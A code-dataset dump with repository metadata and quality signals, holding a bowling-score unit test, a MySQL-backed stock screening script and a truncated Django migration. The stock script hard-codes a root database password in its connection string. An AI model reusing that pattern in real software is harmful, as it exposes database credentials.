hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
820049678d432737eb1818c775329bae2223497c | 3,982 | py | Python | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | 1 | 2021-03-18T20:51:18.000Z | 2021-03-18T20:51:18.000Z | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | 1 | 2021-04-19T00:30:35.000Z | 2021-04-19T00:30:35.000Z | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | null | null | null | import unittest
from z3 import*
from bowling import bowlingScore
class BowlingScoreTest(unittest.TestCase):
def test_all_zeros(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 0)
def test_all_strikes(self):
pins_per_roll = (10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10)
self.assertEqual(bowlingScore(pins_per_roll), 300)
def test_tenth_frame_all_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10)
self.assertEqual(bowlingScore(pins_per_roll), 30)
def test_tenth_frame_first_two_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 2)
self.assertEqual(bowlingScore(pins_per_roll), 22)
def test_tenth_frame_first_one_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 2, 2)
self.assertEqual(bowlingScore(pins_per_roll), 14)
def test_tenth_frame_strike_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 2, 8)
self.assertEqual(bowlingScore(pins_per_roll), 20)
def test_tenth_frame_spare_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 8, 10)
self.assertEqual(bowlingScore(pins_per_roll), 20)
def test_tenth_frame_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 8, 6)
self.assertEqual(bowlingScore(pins_per_roll), 16)
def test_consecutive_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 65)
def test_consecutive_strikes_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 88)
def test_strike_strike_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 5, 5, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 60)
def test_strike_strike_spare_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 5, 5, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 75)
def test_consecutive_spares(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 5, 5, 2, 7, 4, 6, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 36)
def test_consecutive_spares_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 5, 5, 2, 7, 4, 6, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 51)
def test_single_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 10)
def test_single_strike_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 5, 3, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 26)
def test_single_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 10)
def test_single_spare_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 5, 3, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 23)
def test_all_open_frames(self):
pins_per_roll = (1, 2, 3, 4, 5, 4, 3, 2, 1, 0, 1, 2, 3, 4, 5, 4, 3, 2, 1, 0)
self.assertEqual(bowlingScore(pins_per_roll), 50)
def test_all_open_frames(self):
pins_per_roll = (5, 3, 8, 2, 3, 4, 8, 0, 10, 4, 4, 2, 6, 7, 2, 6, 1, 9, 0)
self.assertEqual(bowlingScore(pins_per_roll), 95)
if __name__ == "__main__":
unittest.main() | 45.770115 | 91 | 0.585635 | 735 | 3,982 | 2.955102 | 0.087075 | 0.221915 | 0.29558 | 0.344383 | 0.837937 | 0.802947 | 0.77256 | 0.700276 | 0.700276 | 0.633057 | 0 | 0.155593 | 0.259166 | 3,982 | 87 | 92 | 45.770115 | 0.580678 | 0 | 0 | 0.090909 | 0 | 0 | 0.002053 | 0 | 0 | 0 | 0 | 0 | 0.30303 | 1 | 0.30303 | false | 0 | 0.045455 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
822e4969fbf9d9fc830a89018d7092a3c75135d8 | 14,184 | py | Python | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | '''
Created on Nov 14, 2020
@author: Forrest Li
'''
from sqlalchemy import create_engine
import pymysql
import pandas as pd
import chinastock as cs
#import cbs_score_urlopen as cscore
import cbs_score as cscore
import time
db_connection_str = 'mysql+pymysql://root:A1234567@localhost/ms_financials_db'
db_connection = create_engine(db_connection_str)
pd.set_option("display.max_rows", None, "display.max_columns", None)
ticker_df = pd.read_sql(
"""
SELECT * FROM ms_financials_db.morningstar_key_eps_percent where 3_year_average>20 and 5_year_average>18 and 10_year_average>15 and period in ('2019-12-31','2020-03-31','2020-06-30','2020-09-30')
order by 3_year_average desc
"""
, con=db_connection)
white_list=(ticker_df['ticker'].tolist())
#time.sleep(60)
cbs_d={}
#cbs_ch_d={'XHKG:02233': 'NAN', '000048': ['23.16', '33.14'], 'XHKG:00613': 'NAN', '600570': ['21.16', '56.91'], '300122': ['41.66', '69.49'], '600031': ['23.93', '35.12'], '600764': ['47.9', '66.7'], 'XHKG:00119': 'NAN', '600516': ['33.94', '81.85'], 'XHKG:00743': 'NAN', '600587': ['22.79', '21.55'], '600745': ['23.86', '34.79'], '300016': ['35.97', '73.97'], '005670': 'NAN', '300308': ['37.01', '37.58'], '002161': ['30.07', '21.92'], 'XHKG:00124': 'NAN', '601100': ['30.38', '52.41'], '000672': ['28.5', '58.15'], '600801': ['35.39', '51.68'], '000885': ['41.62', '41.83'], '300107': ['52.47', '75.52'], '000830': ['22.65', '47.49'], '000567': [], '300276': ['25.36', '20.35'], '601003': ['21.36', '59.57'], '000779': ['33.13', '73.13'], '300132': ['45.81', '67.9'], '002611': ['42.79', '49.76'], '003960': 'NAN', '300205': ['31.64', '32.53'], '000961': ['13.99', '12.32'], '002016': ['33.95', '71.7'], '600673': ['15.1', '54.65'], '300123': ['18.56', '24.44'], 'XHKG:01918': 'NAN', '600215': ['15.36', '19.48'], '300226': ['27.69', '28.08'], '000025': ['41.21', '46.01'], '200025': 'NAN', '600753': ['45.58', '74.91'], '600781': ['66.63', '52.87'], '006580': 'NAN', '000560': ['37.08', '19.07'], '600282': ['26.16', '56.48'], '001390': 'NAN', '600731': ['25.5', '38.01'], '600702': ['31.84', '42.31'], '600853': ['18.45', '23.47'], '600456': ['24.22', '18.51'], '000789': ['44.15', '60.38'], '600782': ['28.45', '65.21'], '600768': ['44.52', '67.37'], '600728': ['35.42', '37.17'], '600287': ['36.43', '37.36'], 'XHKG:03347': 'NAN', '300347': ['61.82', '64.9'], '600328': ['24.89', '42.53'], '002299': ['47.35', '26.75'], '600160': ['41.09', '63.12'], '002097': ['21.39', '21.19'], '600250': ['33.3', '53.93'], '002182': ['38.98', '32.55'], '600810': ['31.29', '31.99'], '600985': ['47.8', '56.07'], '000736': ['26.86', '37.18'], '600260': ['29.08', '41.76'], '000705': ['37.03', '36.02'], '002190': ['47.1', '23.95'], '300012': ['60.36', '43.97'], '000795': ['42.87', '53.19'], '002135': 
['16.19', '22.94'], '600512': ['39.56', '42.93'], '002214': ['35.66', '31.01'], '002189': ['30.45', '42.74'], '601225': ['39.04', '61.6'], '600295': ['22.91', '28.77'], '002632': ['53.6', '58.71'], '600368': ['24.01', '29.95'], '600585': ['60.92', '79.78', '93.27', '94.96', '94.23', '92.99', '94.27', '94.96', '95.91', '95.35', '94.23'], 'XHKG:00914': 'NAN', '300236': ['50.0', '51.88'], '002384': ['27.96', '30.85'], '000906': ['44.38', '43.21'], '000757': ['45.78', '48.67'], '002458': ['71.16', '17.3'], '000656': ['31.86', '27.17'], '002746': ['81.96', '45.75'], '600132': ['44.67', '67.15'], '002475': ['57.46', '52.46'], '002127': ['80.32', '83.12'], '300198': ['44.22', '31.08'], '000661': ['74.81', '74.61'], '000061': ['19.86', '18.25'], '600466': ['28.56', '27.27'], '300285': ['66.58', '60.75'], 'XHKG:00581': 'NAN', '600052': ['51.1', '39.34'], 'XHKG:02007': 'NAN', '600763': ['79.52', '89.5'], '600846': ['37.83', '34.97'], '002605': ['49.03', '45.62'], '600559': ['54.97', '58.16'], '002541': ['32.31', '29.71'], '002599': ['28.02', '43.79'], '003230': 'NAN', '002080': ['27.99', '31.06'], '002175': ['31.61', '14.67'], '002088': ['50.18', '68.45'], '002099': ['49.83', '57.01'], '600809': ['63.97', '64.01'], '003090': 'NAN', 'XHKG:02382': 'NAN', '002057': ['58.7', '69.33'], '601016': ['21.87', '21.96'], '002648': ['39.41', '65.58'], '002371': ['31.99', '27.72'], '002601': ['35.5', '62.81'], '601012': ['70.69', '71.27', '54.99', '74.49', '74.83', '68.96', '71.78', '74.49', '79.38', '76.62', '74.83'], '002438': ['30.26', '25.32'], '000682': ['44.5', '61.03'], '000951': ['26.76', '39.34'], '600567': ['28.96', '49.5'], '300232': ['65.25', '54.41'], '601058': ['31.69', '30.09'], '002645': ['48.98', '56.85'], '300316': ['59.66', '50.1'], '002332': ['40.49', '47.3'], '600426': ['45.6', '48.35'], '300014': ['53.77', '45.64'], 'XHKG:00512': 'NAN', '600277': ['32.42', '43.74'], 'XHKG:00535': 'NAN', 'XHKG:01813': 'NAN', '600486': ['54.24', '63.15'], 'XHKG:01169': 'NAN', 
'300200': ['56.88', '38.92'], '002461': ['29.95', '32.58'], '601888': ['85.28', '89.36'], '600436': ['80.02', '83.23'], '601677': ['45.34', '45.08'], '002402': ['60.34', '69.64'], '601588': ['24.99', '28.62'], 'XHKG:00588': 'NAN', 'XHKG:01600': 'NAN', '600668': ['53.7', '58.7'], '000596': ['61.41', '68.71'], '200596': 'NAN', '600325': ['25.71', '21.93'], '000537': ['30.11', '35.02'], '000858': ['79.34', '83.35', '85.32', '85.99', '88.15', '87.29', '90.6', '85.99', '88.12', '88.33', '88.15'], 'XHKG:00189': 'NAN', '300003': ['64.23', '57.53'], '002439': ['65.43', '69.0'], '600956': ['22.93', '28.07'], 'XHKG:00956': 'NAN', '300137': ['64.74', '76.57'], '600519': ['88.47', '92.81', '93.62', '80.41', '84.69', '96.79', '98.03', '80.41', '85.57', '82.16', '84.69'], '002600': ['32.53', '59.04'], '300038': ['39.96', '56.68'], '300184': ['38.12', '53.07'], '002602': ['63.5', '62.3'], '601318': [], 'XHKG:02318': 'NAN', '600491': ['21.32', '20.39'], 'XHKG:01098': 'NAN', '000636': ['23.61', '37.75'], '600452': ['58.09', '52.72'], '600507': ['55.06', '70.62'], '002507': ['78.79', '78.02'], '300088': ['48.27', '49.36'], '300015': ['77.21', '77.58'], '300059': [], '000756': ['32.64', '42.06'], 'XHKG:00719': 'NAN', '300357': ['89.9', '88.82'], '600161': ['43.62', '88.83'], '000568': ['83.07', '85.29'], '601601': [], 'XHKG:02601': 'NAN', '002110': ['67.63', '83.69'], '600309': ['48.9', '60.65'], '002373': ['63.26', '66.35'], 'XHKG:00881': 'NAN', '002511': ['57.81', '58.14'], '002714': ['65.28', '68.74', '31.49', '77.49', '82.17', '31.29', '52.5', '77.49', '85.26', '84.98', '82.17'], '002035': ['73.36', '71.48'], 'XHKG:00700': 'NAN', '002020': ['46.72', '52.38'], '002139': ['55.11', '59.23'], '300383': ['54.27', '38.32'], '002262': ['73.35', '77.53'], '002221': ['38.71', '47.8'], '600667': ['36.87', '40.2'], 'XHKG:01061': 'NAN', '600340': ['39.04', '35.91'], 'XHKG:00095': 'NAN', '600577': ['46.66', '54.32'], '600995': ['45.42', '49.26'], 'XHKG:02020': 'NAN', 'XHKG:00384': 'NAN', 
'300365': ['78.14', '72.77'], '300031': ['69.37', '61.13'], '601799': ['54.28', '53.95'], 'XHKG:00098': 'NAN', '600529': ['62.45', '60.84'], '600276': ['90.39', '87.75', '84.51', '93.19', '92.87', '90.27', '93.66', '93.19', '90.95', '93.1', '92.87'], '600438': ['52.06', '54.93'], '002637': ['44.16', '32.15'], '300021': ['42.48', '37.58'], '600064': ['36.17', '34.9'], '600872': ['62.23', '62.92'], 'XHKG:00240': 'NAN', '601233': ['49.59', '53.53'], '002587': ['69.14', '59.87']}
for ticker in white_list:
#for k,v in cbs_ch_d.items():
print(ticker)
if 'XHKG' in ticker:
ticker = ticker[5:]
try:
cs_score=cscore.get_cbs_score(ticker)
print(cs_score)
if(cs_score==[]):
time.sleep(300)
else:
time.sleep(60)
cbs_d[ticker] = cs_score
except (RuntimeError, TypeError, NameError,AttributeError,ConnectionError) as E:
print(E)
print(cbs_d)
#{'XHKG:02233': 'NAN', '000048': ['23.16', '33.14'], 'XHKG:00613': 'NAN', '600570': ['21.16', '56.91'], '300122': ['41.66', '69.49'], '600031': ['23.93', '35.12'], '600764': ['47.9', '66.7'], 'XHKG:00119': 'NAN', '600516': ['33.94', '81.85'], 'XHKG:00743': 'NAN', '600587': ['22.79', '21.55'], '600745': ['23.86', '34.79'], '300016': ['35.97', '73.97'], '005670': 'NAN', '300308': ['37.01', '37.58'], '002161': ['30.07', '21.92'], 'XHKG:00124': 'NAN', '601100': ['30.38', '52.41'], '000672': ['28.5', '58.15'], '600801': ['35.39', '51.68'], '000885': ['41.62', '41.83'], '300107': ['52.47', '75.52'], '000830': ['22.65', '47.49'], '000567': [], '300276': ['25.36', '20.35'], '601003': ['21.36', '59.57'], '000779': ['33.13', '73.13'], '300132': ['45.81', '67.9'], '002611': ['42.79', '49.76'], '003960': 'NAN', '300205': ['31.64', '32.53'], '000961': ['13.99', '12.32'], '002016': ['33.95', '71.7'], '600673': ['15.1', '54.65'], '300123': ['18.56', '24.44'], 'XHKG:01918': 'NAN', '600215': ['15.36', '19.48'], '300226': ['27.69', '28.08'], '000025': ['41.21', '46.01'], '200025': 'NAN', '600753': ['45.58', '74.91'], '600781': ['66.63', '52.87'], '006580': 'NAN', '000560': ['37.08', '19.07'], '600282': ['26.16', '56.48'], '001390': 'NAN', '600731': ['25.5', '38.01'], '600702': ['31.84', '42.31'], '600853': ['18.45', '23.47'], '600456': ['24.22', '18.51'], '000789': ['44.15', '60.38'], '600782': ['28.45', '65.21'], '600768': ['44.52', '67.37'], '600728': ['35.42', '37.17'], '600287': ['36.43', '37.36'], 'XHKG:03347': 'NAN', '300347': ['61.82', '64.9'], '600328': ['24.89', '42.53'], '002299': ['47.35', '26.75'], '600160': ['41.09', '63.12'], '002097': ['21.39', '21.19'], '600250': ['33.3', '53.93'], '002182': ['38.98', '32.55'], '600810': ['31.29', '31.99'], '600985': ['47.8', '56.07'], '000736': ['26.86', '37.18'], '600260': ['29.08', '41.76'], '000705': ['37.03', '36.02'], '002190': ['47.1', '23.95'], '300012': ['60.36', '43.97'], '000795': ['42.87', '53.19'], '002135': ['16.19', 
'22.94'], '600512': ['39.56', '42.93'], '002214': ['35.66', '31.01'], '002189': ['30.45', '42.74'], '601225': ['39.04', '61.6'], '600295': ['22.91', '28.77'], '002632': ['53.6', '58.71'], '600368': ['24.01', '29.95'], '600585': ['60.92', '79.78', '93.27', '94.96', '94.23', '92.99', '94.27', '94.96', '95.91', '95.35', '94.23'], 'XHKG:00914': 'NAN', '300236': ['50.0', '51.88'], '002384': ['27.96', '30.85'], '000906': ['44.38', '43.21'], '000757': ['45.78', '48.67'], '002458': ['71.16', '17.3'], '000656': ['31.86', '27.17'], '002746': ['81.96', '45.75'], '600132': ['44.67', '67.15'], '002475': ['57.46', '52.46'], '002127': ['80.32', '83.12'], '300198': ['44.22', '31.08'], '000661': ['74.81', '74.61'], '000061': ['19.86', '18.25'], '600466': ['28.56', '27.27'], '300285': ['66.58', '60.75'], 'XHKG:00581': 'NAN', '600052': ['51.1', '39.34'], 'XHKG:02007': 'NAN', '600763': ['79.52', '89.5'], '600846': ['37.83', '34.97'], '002605': ['49.03', '45.62'], '600559': ['54.97', '58.16'], '002541': ['32.31', '29.71'], '002599': ['28.02', '43.79'], '003230': 'NAN', '002080': ['27.99', '31.06'], '002175': ['31.61', '14.67'], '002088': ['50.18', '68.45'], '002099': ['49.83', '57.01'], '600809': ['63.97', '64.01'], '003090': 'NAN', 'XHKG:02382': 'NAN', '002057': ['58.7', '69.33'], '601016': ['21.87', '21.96'], '002648': ['39.41', '65.58'], '002371': ['31.99', '27.72'], '002601': ['35.5', '62.81'], '601012': ['70.69', '71.27', '54.99', '74.49', '74.83', '68.96', '71.78', '74.49', '79.38', '76.62', '74.83'], '002438': ['30.26', '25.32'], '000682': ['44.5', '61.03'], '000951': ['26.76', '39.34'], '600567': ['28.96', '49.5'], '300232': ['65.25', '54.41'], '601058': ['31.69', '30.09'], '002645': ['48.98', '56.85'], '300316': ['59.66', '50.1'], '002332': ['40.49', '47.3'], '600426': ['45.6', '48.35'], '300014': ['53.77', '45.64'], 'XHKG:00512': 'NAN', '600277': ['32.42', '43.74'], 'XHKG:00535': 'NAN', 'XHKG:01813': 'NAN', '600486': ['54.24', '63.15'], 'XHKG:01169': 'NAN', '300200': 
['56.88', '38.92'], '002461': ['29.95', '32.58'], '601888': ['85.28', '89.36'], '600436': ['80.02', '83.23'], '601677': ['45.34', '45.08'], '002402': ['60.34', '69.64'], '601588': ['24.99', '28.62'], 'XHKG:00588': 'NAN', 'XHKG:01600': 'NAN', '600668': ['53.7', '58.7'], '000596': ['61.41', '68.71'], '200596': 'NAN', '600325': ['25.71', '21.93'], '000537': ['30.11', '35.02'], '000858': ['79.34', '83.35', '85.32', '85.99', '88.15', '87.29', '90.6', '85.99', '88.12', '88.33', '88.15'], 'XHKG:00189': 'NAN', '300003': ['64.23', '57.53'], '002439': ['65.43', '69.0'], '600956': ['22.93', '28.07'], 'XHKG:00956': 'NAN', '300137': ['64.74', '76.57'], '600519': ['88.47', '92.81', '93.62', '80.41', '84.69', '96.79', '98.03', '80.41', '85.57', '82.16', '84.69'], '002600': ['32.53', '59.04'], '300038': ['39.96', '56.68'], '300184': ['38.12', '53.07'], '002602': ['63.5', '62.3'], '601318': [], 'XHKG:02318': 'NAN', '600491': ['21.32', '20.39'], 'XHKG:01098': 'NAN', '000636': ['23.61', '37.75'], '600452': ['58.09', '52.72'], '600507': ['55.06', '70.62'], '002507': ['78.79', '78.02'], '300088': ['48.27', '49.36'], '300015': ['77.21', '77.58'], '300059': [], '000756': ['32.64', '42.06'], 'XHKG:00719': 'NAN', '300357': ['89.9', '88.82'], '600161': ['43.62', '88.83'], '000568': ['83.07', '85.29'], '601601': [], 'XHKG:02601': 'NAN', '002110': ['67.63', '83.69'], '600309': ['48.9', '60.65'], '002373': ['63.26', '66.35'], 'XHKG:00881': 'NAN', '002511': ['57.81', '58.14'], '002714': ['65.28', '68.74', '31.49', '77.49', '82.17', '31.29', '52.5', '77.49', '85.26', '84.98', '82.17'], '002035': ['73.36', '71.48'], 'XHKG:00700': 'NAN', '002020': ['46.72', '52.38'], '002139': ['55.11', '59.23'], '300383': ['54.27', '38.32'], '002262': ['73.35', '77.53'], '002221': ['38.71', '47.8'], '600667': ['36.87', '40.2'], 'XHKG:01061': 'NAN', '600340': ['39.04', '35.91'], 'XHKG:00095': 'NAN', '600577': ['46.66', '54.32'], '600995': ['45.42', '49.26'], 'XHKG:02020': 'NAN', 'XHKG:00384': 'NAN', '300365': 
['78.14', '72.77'], '300031': ['69.37', '61.13'], '601799': ['54.28', '53.95'], 'XHKG:00098': 'NAN', '600529': ['62.45', '60.84'], '600276': ['90.39', '87.75', '84.51', '93.19', '92.87', '90.27', '93.66', '93.19', '90.95', '93.1', '92.87'], '600438': ['52.06', '54.93'], '002637': ['44.16', '32.15'], '300021': ['42.48', '37.58'], '600064': ['36.17', '34.9'], '600872': ['62.23', '62.92'], 'XHKG:00240': 'NAN', '601233': ['49.59', '53.53'], '002587': ['69.14', '59.87']}
| 283.68 | 6,462 | 0.492809 | 2,355 | 14,184 | 2.948195 | 0.172399 | 0.008066 | 0.003457 | 0.004033 | 0.884632 | 0.880311 | 0.880311 | 0.880311 | 0.880311 | 0.880311 | 0 | 0.451102 | 0.110406 | 14,184 | 49 | 6,463 | 289.469388 | 0.099144 | 0.918923 | 0 | 0 | 0 | 0 | 0.114903 | 0.063709 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
4144ee2a0bad933fc39b7a43a1bf7331e7d75894 | 2,785 | py | Python | tasksapi/migrations/0002_auto_20181204_2210.py | mwiens91/saltant | 9e72175a896f5859ada304ad3ae4d84dfc3834db | [
"MIT"
] | 3 | 2018-12-08T01:18:29.000Z | 2018-12-14T23:18:42.000Z | tasksapi/migrations/0002_auto_20181204_2210.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 3 | 2019-05-23T07:43:13.000Z | 2021-06-10T20:46:53.000Z | tasksapi/migrations/0002_auto_20181204_2210.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 2 | 2019-03-13T22:31:09.000Z | 2019-05-03T00:18:30.000Z | # Generated by Django 2.1.2 on 2018-12-05 06:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tasksapi', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='containertaskinstance',
name='task_queue',
field=models.ForeignKey(help_text='The queue this instance runs on.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.TaskQueue'),
),
migrations.AlterField(
model_name='containertaskinstance',
name='task_type',
field=models.ForeignKey(help_text='The task type for which this is an instance.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.ContainerTaskType'),
),
migrations.AlterField(
model_name='containertaskinstance',
name='user',
field=models.ForeignKey(help_text='The author of this instance.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='containertasktype',
name='user',
field=models.ForeignKey(help_text='The author of this task.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='executabletaskinstance',
name='task_queue',
field=models.ForeignKey(help_text='The queue this instance runs on.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.TaskQueue'),
),
migrations.AlterField(
model_name='executabletaskinstance',
name='task_type',
